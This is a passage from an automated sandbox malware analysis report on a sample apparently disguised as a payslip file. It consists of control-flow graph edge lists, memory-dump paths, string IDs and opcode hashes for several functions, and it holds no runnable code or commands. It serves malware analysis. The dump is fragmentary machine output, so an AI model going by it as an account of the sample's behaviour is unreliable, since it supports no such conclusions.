6628084-66280b6 1195->1197 1204 66280c1-66280dd 1197->1204 1205 66280b8-66280bc 1197->1205 1204->1168 1206 66280df-6628136 call 66266b0 1204->1206 1205->1183 1208 66280be 1205->1208 1206->1168 1208->1204 1233 662836d-662836f 1231->1233 1232->1233 1233->1165 1234 6628371-6628376 1233->1234 1235 6628384 1234->1235 1236 6628378-6628382 1234->1236 1237 6628389-662838b 1235->1237 1236->1237 1237->1165 1238 662838d-6628399 1237->1238 1238->1165
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 3311b8f5878489577d8cb4d06682c956e50fe795b45a24eb5c1a903651a0ae7d
                                                                                                            • Instruction ID: 50227af3966d4f5bee234de3c8509f72eab337d8cb0f3f66d04d0290f8cf5652
                                                                                                            • Opcode Fuzzy Hash: 3311b8f5878489577d8cb4d06682c956e50fe795b45a24eb5c1a903651a0ae7d
                                                                                                            • Instruction Fuzzy Hash: 5802AC30B006269FDB54DF64D894AAEB7E2FF84304F148569E40ADB385DB31EC86CB91
                                                                                                            Function 066256A8 Relevance: 1.8, Strings: 1, Instructions: 590COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $
                                                                                                            • API String ID: 0-3993045852
                                                                                                            • Opcode ID: 965d1869e89af9e0272cb757c11062c2734a01956e7e2eaf6cde326584039074
                                                                                                            • Instruction ID: 5685c63266669bc903448a7ad7c8b8dabce4f0d25a103c2c1fe599fb1fd09871
                                                                                                            • Opcode Fuzzy Hash: 965d1869e89af9e0272cb757c11062c2734a01956e7e2eaf6cde326584039074
                                                                                                            • Instruction Fuzzy Hash: D322B371E006269FDF64DF64C4846AEBBF2EF85310F20846AD44AEB345DA35ED42CB91
                                                                                                            Function 06622710 Relevance: 1.1, Instructions: 1067COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dcacc67238b91cf969dcda2e07d1919e81a86574da5819a01117de30a7fb50ec
                                                                                                            • Instruction ID: 2f2ecc6bc6a9914e755e5b8ae0506de169fbdeced215ef47e166472aa8e5ed10
                                                                                                            • Opcode Fuzzy Hash: dcacc67238b91cf969dcda2e07d1919e81a86574da5819a01117de30a7fb50ec
                                                                                                            • Instruction Fuzzy Hash: ADA25534A006298FDB64CB68C594B9DBBF2FB49314F1484AAE449EB361DB34ED85CF41
                                                                                                            Function 06626700 Relevance: .8, Instructions: 815COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7740663c1c6401b6c3888b47a9f1719959da41606b4525fc88ac3c229266fe3b
                                                                                                            • Instruction ID: d20ca2a1ac09b1aca8308f3e62d7d7edd9eeba44434b0aa03813ccedb524a620
                                                                                                            • Opcode Fuzzy Hash: 7740663c1c6401b6c3888b47a9f1719959da41606b4525fc88ac3c229266fe3b
                                                                                                            • Instruction Fuzzy Hash: 4D62AD34A006268FDB54DB68D594BAEBBF2EF84314F148469E80ADB351DB35EC46CF81
                                                                                                            Function 0662B342 Relevance: .6, Instructions: 568COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9327e5ab09bfbe479e863e9d3221ad71191d642b38e64904b2862475ac791d22
                                                                                                            • Instruction ID: 111146851bd749390e537f3d4b04eeec1da5a85c04dae8338333a395a4daceb5
                                                                                                            • Opcode Fuzzy Hash: 9327e5ab09bfbe479e863e9d3221ad71191d642b38e64904b2862475ac791d22
                                                                                                            • Instruction Fuzzy Hash: 10226170E1052A8FDF64DB68D4847ADB7F1EB89314F248826E419DB395DA34DC81CF52
                                                                                                            Function 0662ADE0 Relevance: 10.4, Strings: 8, Instructions: 389COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 662ade0-662adfe 1 662ae00-662ae03 0->1 2 662ae26-662ae29 1->2 3 662ae05-662ae21 1->3 4 662ae2f-662ae32 2->4 5 662affd-662b006 2->5 3->2 9 662ae46-662ae49 4->9 10 662ae34-662ae41 4->10 6 662ae89-662ae92 5->6 7 662b00c-662b016 5->7 13 662b017-662b04e 6->13 14 662ae98-662ae9c 6->14 11 662ae5a-662ae5d 9->11 12 662ae4b-662ae4f 9->12 10->9 16 662ae67-662ae6a 11->16 17 662ae5f-662ae64 11->17 12->7 15 662ae55 12->15 26 662b050-662b053 13->26 19 662aea1-662aea4 14->19 15->11 21 662ae84-662ae87 16->21 22 662ae6c-662ae7f 16->22 17->16 24 662aea6-662aeaf 19->24 25 662aeb4-662aeb6 19->25 21->6 21->19 22->21 24->25 27 662aeb8 25->27 28 662aebd-662aec0 25->28 31 662b076-662b079 26->31 32 662b055-662b071 26->32 27->28 28->1 29 662aec6-662aeea 28->29 49 662aef0-662aeff 29->49 50 662affa 29->50 33 662b07b call 662b342 31->33 34 662b088-662b08b 31->34 32->31 39 662b081-662b083 33->39 36 662b098-662b09b 34->36 37 662b08d-662b091 34->37 41 662b0a1-662b0dc 36->41 42 662b304-662b307 36->42 40 662b093 37->40 37->41 39->34 40->36 53 662b0e2-662b0ee 41->53 54 662b2cf-662b2e2 41->54 44 662b314-662b316 42->44 45 662b309-662b313 42->45 47 662b318 44->47 48 662b31d-662b320 44->48 47->48 48->26 52 662b326-662b330 48->52 57 662af01-662af07 49->57 58 662af17-662af52 call 66266b0 49->58 50->5 60 662b0f0-662b109 53->60 61 662b10e-662b152 53->61 55 662b2e4 54->55 55->42 62 662af0b-662af0d 57->62 63 662af09 57->63 74 662af54-662af5a 58->74 75 662af6a-662af81 58->75 60->55 79 662b154-662b166 61->79 80 662b16e-662b1ad 61->80 62->58 63->58 77 662af5e-662af60 74->77 78 662af5c 74->78 88 662af83-662af89 75->88 89 662af99-662afaa 75->89 77->75 78->75 79->80 85 662b1b3-662b28e call 66266b0 80->85 86 662b294-662b2a9 80->86 85->86 86->54 91 662af8b 88->91 92 662af8d-662af8f 88->92 96 662afc2-662aff3 89->96 97 662afac-662afb2 89->97 91->89 92->89 96->50 99 662afb6-662afb8 97->99 100 662afb4 97->100 99->96 100->96
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-3823777903
                                                                                                            • Opcode ID: 538ae846aa1e26527bee2b2fb50ab10b3e9ca277d9e499807b909e3e8e52ca3b
                                                                                                            • Instruction ID: 2f2db2ab81b59182b4ace0dd21475f41ee9e4ff7dab11503f97cdbaceefd79a6
                                                                                                            • Opcode Fuzzy Hash: 538ae846aa1e26527bee2b2fb50ab10b3e9ca277d9e499807b909e3e8e52ca3b
                                                                                                            • Instruction Fuzzy Hash: 81E16D70E1062A8FCB65DFA8D4846AEB7F2EF84304F148929E41ADB345DB74DC46CB81
                                                                                                            Function 0662B760 Relevance: 8.0, Strings: 6, Instructions: 471COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 255 662b760-662b780 256 662b782-662b785 255->256 257 662b787-662b78a 256->257 258 662b79c-662b79f 256->258 259 662b790-662b797 257->259 260 662bb0d-662bb46 257->260 261 662b7a1-662b7aa 258->261 262 662b7af-662b7b2 258->262 259->258 268 662bb48-662bb4b 260->268 261->262 263 662b7b4-662b7b7 262->263 264 662b7bc-662b7bf 262->264 263->264 266 662b7c1-662b7d6 264->266 267 662b7fe-662b801 264->267 266->260 277 662b7dc-662b7f9 266->277 269 662b803-662b80a 267->269 270 662b81b-662b81e 267->270 271 662bb6e-662bb71 268->271 272 662bb4d-662bb69 268->272 269->260 273 662b810-662b816 269->273 274 662b820-662b827 270->274 275 662b838-662b83b 270->275 278 662bb77-662bb9f 271->278 279 662bddd-662bddf 271->279 272->271 273->270 274->260 280 662b82d-662b833 274->280 281 662b865-662b868 275->281 282 662b83d-662b844 275->282 277->267 310 662bba1-662bba4 278->310 311 662bba9-662bbed 278->311 286 662bde1 279->286 287 662bde6-662bde9 279->287 280->275 283 662b870-662b873 281->283 284 662b86a-662b86b 281->284 282->260 288 662b84a-662b85a 282->288 289 662b896-662b899 283->289 290 662b875-662b891 283->290 284->283 286->287 287->268 292 662bdef-662bdf8 287->292 288->263 301 662b860 288->301 289->263 295 662b89f-662b8a2 289->295 290->289 298 662b8a4-662b8a7 295->298 299 662b8ac-662b8af 295->299 298->299 302 662b8b1-662b8b6 299->302 303 662b8b9-662b8bc 299->303 301->281 302->303 305 662b8c9-662b8cc 303->305 306 662b8be-662b8c4 303->306 308 662b8f6-662b8f9 305->308 309 662b8ce-662b8d5 305->309 306->305 313 662b8fb-662b904 308->313 314 662b90f-662b912 308->314 309->260 312 662b8db-662b8eb 309->312 310->292 344 662bdd2-662bddc 311->344 345 662bbf3-662bbfc 311->345 325 662b8f1 312->325 326 662ba9a-662baa1 312->326 316 662b90a 313->316 317 662b9bc-662b9c5 313->317 318 662b926-662b929 314->318 319 662b914-662b91b 314->319 316->314 317->260 321 662b9cb-662b9d2 317->321 323 662b92b-662b934 318->323 324 662b939-662b93c 318->324 319->261 322 662b921 319->322 328 662b9d7-662b9da 321->328 322->318 323->324 329 662b991-662b994 324->329 330 662b93e-662b98c call 66266b0 324->330 325->308 326->260 334 662baa3-662bab3 326->334 328->313 331 662b9e0-662b9e3 328->331 332 662b996-662b999 329->332 333 662b9a4-662b9a7 329->333 330->329 338 662b9f5-662b9f8 331->338 339 662b9e5 331->339 332->257 340 662b99f 332->340 335 662b9b7-662b9ba 333->335 336 662b9a9-662b9b2 333->336 334->282 347 662bab9 334->347 335->317 335->328 336->335 338->263 346 662b9fe-662ba01 338->346 351 662b9ed-662b9f0 339->351 340->333 349 662bc02-662bc6e call 66266b0 345->349 350 662bdc8-662bdcd 345->350 352 662ba03-662ba18 346->352 353 662ba40-662ba43 346->353 354 662babe-662bac1 347->354 389 662bc74-662bc79 349->389 390 662bd68-662bd7d 349->390 350->344 351->338 352->260 370 662ba1e-662ba3b 352->370 355 662ba45-662ba4c 353->355 356 662ba5d-662ba60 353->356 357 662bac3-662bac5 354->357 358 662bac8-662bacb 354->358 355->260 361 662ba52-662ba58 355->361 362 662ba82-662ba85 356->362 363 662ba62-662ba7d 356->363 357->358 366 662bade-662bae1 358->366 367 662bacd-662bad9 358->367 361->356 368 662ba87-662ba90 362->368 369 662ba95-662ba98 362->369 363->362 366->263 373 662bae7-662baea 366->373 367->366 368->369 369->326 369->354 370->353 373->332 377 662baf0-662baf2 373->377 380 662baf4 377->380 381 662baf9-662bafc 377->381 380->381 381->256 383 662bb02-662bb0c 381->383 391 662bc95 389->391 392 662bc7b-662bc81 389->392 390->350 396 662bc97-662bc9d 391->396 394 662bc83-662bc85 392->394 395 662bc87-662bc89 392->395 397 662bc93 394->397 395->397 398 662bcb2-662bcbf 396->398 399 662bc9f-662bca5 396->399 397->396 405 662bcc1-662bcc7 398->405 406 662bcd7-662bce4 398->406 400 662bd53-662bd62 399->400 401 662bcab 399->401 400->389 400->390 401->398 402 662bce6-662bcf3 401->402 403 662bd1a-662bd27 401->403 415 662bcf5-662bcfb 402->415 416 662bd0b-662bd18 402->416 412 662bd29-662bd2f 403->412 413 662bd3f-662bd4c 403->413 408 662bccb-662bccd 405->408 409 662bcc9 405->409 406->400 408->406 409->406 417 662bd33-662bd35 412->417 418 662bd31 412->418 413->400 419 662bcff-662bd01 415->419 420 662bcfd 415->420 416->400 417->413 418->413 419->416 420->416
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 696f2ef3d5118ff353007762984ae788a5b2e906df1274abce51cf4b9371f2ed
                                                                                                            • Instruction ID: 9c5059a0644f676350d48f118fe7ec0145aa1d26e3f0eb710f9b2f17dcb2efc8
                                                                                                            • Opcode Fuzzy Hash: 696f2ef3d5118ff353007762984ae788a5b2e906df1274abce51cf4b9371f2ed
                                                                                                            • Instruction Fuzzy Hash: C8027B30E1062A8FDB64CF68D480AADB7F2EB45318F14896AE419DB355DB35ED81CF81
                                                                                                            Function 06629260 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 639 6629260-6629285 640 6629287-662928a 639->640 641 66292b0-66292b3 640->641 642 662928c-66292ab 640->642 643 6629b73-6629b75 641->643 644 66292b9-66292ce 641->644 642->641 645 6629b77 643->645 646 6629b7c-6629b7f 643->646 650 66292d0-66292d6 644->650 651 66292e6-66292fc 644->651 645->646 646->640 649 6629b85-6629b8f 646->649 653 66292da-66292dc 650->653 654 66292d8 650->654 656 6629307-6629309 651->656 653->651 654->651 657 6629321-6629392 656->657 658 662930b-6629311 656->658 669 6629394-66293b7 657->669 670 66293be-66293da 657->670 659 6629313 658->659 660 6629315-6629317 658->660 659->657 660->657 669->670 675 6629406-6629421 670->675 676 66293dc-66293ff 670->676 681 6629423-6629445 675->681 682 662944c-6629467 675->682 676->675 681->682 687 6629492-662949c 682->687 688 6629469-662948b 682->688 689 662949e-66294a7 687->689 690 66294ac-6629526 687->690 688->687 689->649 696 6629573-6629588 690->696 697 6629528-6629546 690->697 696->643 701 6629562-6629571 697->701 702 6629548-6629557 697->702 701->696 701->697 702->701
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: f2d2a35b66d4c499d1876622200ee59862a676d22999d6ea45b8ff9a1b9b064b
                                                                                                            • Instruction ID: 0fa6b77bb44fe14e967b8ae3a20dce7c6b488da2faaa28d7953b2e23f31d01f4
                                                                                                            • Opcode Fuzzy Hash: f2d2a35b66d4c499d1876622200ee59862a676d22999d6ea45b8ff9a1b9b064b
                                                                                                            • Instruction Fuzzy Hash: 3B916E70B1061A8FDB54EB69D8507AEB3F6AFC9304F10856AD40EEB344EB709D468F91
                                                                                                            Function 0662D068 Relevance: 4.5, Strings: 3, Instructions: 797COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 705 662d068-662d083 706 662d085-662d088 705->706 707 662d0d1-662d0d4 706->707 708 662d08a-662d099 706->708 709 662d0d6-662d118 707->709 710 662d11d-662d120 707->710 711 662d09b-662d0a0 708->711 712 662d0a8-662d0b4 708->712 709->710 713 662d122-662d124 710->713 714 662d12f-662d132 710->714 711->712 715 662da85-662dabe 712->715 716 662d0ba-662d0cc 712->716 720 662d551 713->720 721 662d12a 713->721 717 662d134-662d139 714->717 718 662d13c-662d13f 714->718 728 662dac0-662dac3 715->728 716->707 717->718 723 662d141-662d183 718->723 724 662d188-662d18b 718->724 726 662d554-662d560 720->726 721->714 723->724 730 662d1d4-662d1d7 724->730 731 662d18d-662d1cf 724->731 726->708 729 662d566-662d853 726->729 733 662dae6-662dae9 728->733 734 662dac5-662dae1 728->734 918 662da7a-662da84 729->918 919 662d859-662d85f 729->919 735 662d220-662d223 730->735 736 662d1d9-662d21b 730->736 731->730 742 662daeb-662db17 733->742 743 662db1c-662db1f 733->743 734->733 738 662d225-662d267 735->738 739 662d26c-662d26f 735->739 736->735 738->739 744 662d271-662d280 739->744 745 662d2b8-662d2bb 739->745 742->743 749 662db21 call 662dbdd 743->749 750 662db2e-662db30 743->750 754 662d282-662d287 744->754 755 662d28f-662d29b 744->755 759 662d2ca-662d2cd 745->759 760 662d2bd-662d2bf 745->760 763 662db27-662db29 749->763 752 662db32 750->752 753 662db37-662db3a 750->753 752->753 753->728 764 662db3c-662db4b 753->764 754->755 755->715 765 662d2a1-662d2b3 755->765 768 662d2ea-662d2ed 759->768 769 662d2cf-662d2e5 759->769 766 662d2c5 760->766 767 662d40f-662d418 760->767 763->750 793 662dbb2-662dbc7 764->793 794 662db4d-662dbb0 call 66266b0 764->794 765->745 766->759 775 662d427-662d433 767->775 776 662d41a-662d41f 767->776 771 662d336-662d339 768->771 772 662d2ef-662d331 768->772 769->768 782 662d33b-662d357 771->782 783 662d35c-662d35f 771->783 772->771 784 662d544-662d549 775->784 785 662d439-662d44d 775->785 776->775 782->783 783->726 791 662d365-662d368 783->791 784->720 785->720 809 662d453-662d465 785->809 801 662d3b1-662d3b4 791->801 802 662d36a-662d3ac 791->802 813 662dbc8 793->813 794->793 804 662d3b6-662d3f8 801->804 805 662d3fd-662d3ff 801->805 802->801 804->805 814 662d401 805->814 815 662d406-662d409 805->815 826 662d467-662d46d 809->826 827 662d489-662d48b 809->827 813->813 814->815 815->706 815->767 831 662d471-662d47d 826->831 832 662d46f 826->832 834 662d495-662d4a1 827->834 836 662d47f-662d487 831->836 832->836 846 662d4a3-662d4ad 834->846 847 662d4af 834->847 836->834 851 662d4b4-662d4b6 846->851 847->851 851->720 853 662d4bc-662d4d8 call 66266b0 851->853 863 662d4e7-662d4f3 853->863 864 662d4da-662d4df 853->864 863->784 866 662d4f5-662d542 863->866 864->863 866->720 920 662d861-662d866 919->920 921 662d86e-662d877 919->921 920->921 921->715 922 662d87d-662d890 921->922 924 662d896-662d89c 922->924 925 662da6a-662da74 922->925 926 662d8ab-662d8b4 924->926 927 662d89e-662d8a3 924->927 925->918 925->919 926->715 928 662d8ba-662d8db 926->928 927->926 931 662d8ea-662d8f3 928->931 932 662d8dd-662d8e2 928->932 931->715 933 662d8f9-662d916 931->933 932->931 933->925 936 662d91c-662d922 933->936 936->715 937 662d928-662d941 936->937 939 662d947-662d96e 937->939 940 662da5d-662da64 937->940 939->715 943 662d974-662d97e 939->943 940->925 940->936 943->715 944 662d984-662d99b 943->944 946 662d9aa-662d9c5 944->946 947 662d99d-662d9a8 944->947 946->940 952 662d9cb-662d9e4 call 66266b0 946->952 947->946 956 662d9f3-662d9fc 952->956 957 662d9e6-662d9eb 952->957 956->715 958 662da02-662da56 956->958 957->956 958->940
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q
                                                                                                            • API String ID: 0-831282457
                                                                                                            • Opcode ID: 974266f11609556095abb6bc81f5a59aa286a96ed366dc73992ba4e4e2c33783
                                                                                                            • Instruction ID: d388c8b615f6c8b2e875825da2fdf34788903d93dd47f9e56ea614859928a56f
                                                                                                            • Opcode Fuzzy Hash: 974266f11609556095abb6bc81f5a59aa286a96ed366dc73992ba4e4e2c33783
                                                                                                            • Instruction Fuzzy Hash: 72626F30A007268FCB15EF68D590A5DB7F2FF84309B248A69D0099F759EB71ED46CB81
                                                                                                            Function 04FB4690 Relevance: 4.1, Strings: 3, Instructions: 351COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 966 4fb4690-4fb46b5 967 4fb46bb-4fb46bd 966->967 968 4fb480a-4fb482e 966->968 969 4fb46c3-4fb46cc 967->969 970 4fb4835-4fb48ba 967->970 968->970 972 4fb46df-4fb4706 969->972 973 4fb46ce-4fb46dc 969->973 1003 4fb497b 970->1003 1004 4fb48c0-4fb48d3 970->1004 974 4fb470c-4fb471f call 4fb43dc 972->974 975 4fb4790-4fb4794 972->975 973->972 974->975 992 4fb4721-4fb4774 974->992 977 4fb47cb-4fb47e4 975->977 978 4fb4796-4fb47c3 call 4fb43ec 975->978 987 4fb47ee 977->987 988 4fb47e6 977->988 995 4fb47c8 978->995 987->968 988->987 992->975 998 4fb4776-4fb4789 992->998 995->977 998->975 1005 4fb4980-4fb498b 1003->1005 1004->1003 1009 4fb48d9-4fb48e5 1004->1009 1010 4fb4992-4fb49bb 1005->1010 1009->1005 1012 4fb48eb-4fb4916 1009->1012 1014 4fb49bd-4fb49c6 1010->1014 1015 4fb49c7-4fb4a9c 1010->1015 1012->1003 1023 4fb4918-4fb4924 1012->1023 1034 4fb4aa2-4fb4ab0 1015->1034 1024 4fb4970-4fb497a 1023->1024 1025 4fb4926-4fb4929 1023->1025 1027 4fb492c-4fb4935 1025->1027 1027->1010 1028 4fb4937-4fb4952 1027->1028 1030 4fb495a-4fb495d 1028->1030 1031 4fb4954-4fb4956 1028->1031 1030->1003 1033 4fb495f-4fb496e 1030->1033 1031->1003 1032 4fb4958 1031->1032 1032->1033 1033->1024 1033->1027 1036 4fb4ab9-4fb4af1 1034->1036 1037 4fb4ab2-4fb4ab8 1034->1037 1041 4fb4af3-4fb4af7 1036->1041 1042 4fb4b01 1036->1042 1037->1036 1041->1042 1043 4fb4af9 1041->1043 1044 4fb4b02 1042->1044 1043->1042 1044->1044
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (bq$(bq$(bq
                                                                                                            • API String ID: 0-2716923250
                                                                                                            • Opcode ID: ed798bed3f1838e3e4666af42e8d3b175e2fe7e0a3764fb244d145fe7c8a703b
                                                                                                            • Instruction ID: 1d1069cc4060e5572d4b9cf8d690f6aec1e6c443944ae32834b9968ade7a6ef2
                                                                                                            • Opcode Fuzzy Hash: ed798bed3f1838e3e4666af42e8d3b175e2fe7e0a3764fb244d145fe7c8a703b
                                                                                                            • Instruction Fuzzy Hash: 3ED19D74E003099FDB04DFA9C9546AEBBF2FF89310F148569D449AB392DB34AD42CB91
                                                                                                            Function 06624C78 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1045 6624c78-6624c9c 1046 6624c9e-6624ca1 1045->1046 1047 6624cc2-6624cc5 1046->1047 1048 6624ca3-6624cbd 1046->1048 1049 66253a4-66253a6 1047->1049 1050 6624ccb-6624dc3 1047->1050 1048->1047 1052 66253a8 1049->1052 1053 66253ad-66253b0 1049->1053 1068 6624e46-6624e4d 1050->1068 1069 6624dc9-6624e16 call 6625522 1050->1069 1052->1053 1053->1046 1054 66253b6-66253c3 1053->1054 1070 6624e53-6624ec3 1068->1070 1071 6624ed1-6624eda 1068->1071 1082 6624e1c-6624e38 1069->1082 1088 6624ec5 1070->1088 1089 6624ece 1070->1089 1071->1054 1085 6624e43-6624e44 1082->1085 1086 6624e3a 1082->1086 1085->1068 1086->1085 1088->1089 1089->1071
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq$\Ocq
                                                                                                            • API String ID: 0-3575482020
                                                                                                            • Opcode ID: 71259c34711c0bf77d71df2605ccc6d17e7ae4ad2437acb560d37d2e8ae39d41
                                                                                                            • Instruction ID: 179f11eb9a0bbf8e413fedbc360b5f1b00a682dc551cb12c34d5ee6edea1274e
                                                                                                            • Opcode Fuzzy Hash: 71259c34711c0bf77d71df2605ccc6d17e7ae4ad2437acb560d37d2e8ae39d41
                                                                                                            • Instruction Fuzzy Hash: 01616F30F002199FEB559FA8C8557AEBBF6EB88700F20842AE106AB395DF754D458F91
                                                                                                            Function 0562B098 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1092 562b098-562b0d9 1094 562b0e1-562b10c KiUserCallbackDispatcher 1092->1094 1095 562b115-562b129 1094->1095 1096 562b10e-562b114 1094->1096 1096->1095
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0562B075), ref: 0562B0FF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID: D .s
                                                                                                            • API String ID: 2492992576-3480518460
                                                                                                            • Opcode ID: 7f757f4a3b66aad8c11c8096896012a657728556d7ed9c69d2843a2691d912ec
                                                                                                            • Instruction ID: 28d18e59a1d76613595cc78f402c39a720ad4336f4e05f537a55814b92012bd6
                                                                                                            • Opcode Fuzzy Hash: 7f757f4a3b66aad8c11c8096896012a657728556d7ed9c69d2843a2691d912ec
                                                                                                            • Instruction Fuzzy Hash: 891125B58047598FCB20DF9AC889B9EBBF4EB49324F20845AD519A3351C375A944CFA1
                                                                                                            Function 04FB1DC0 Relevance: 2.8, Strings: 2, Instructions: 268COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
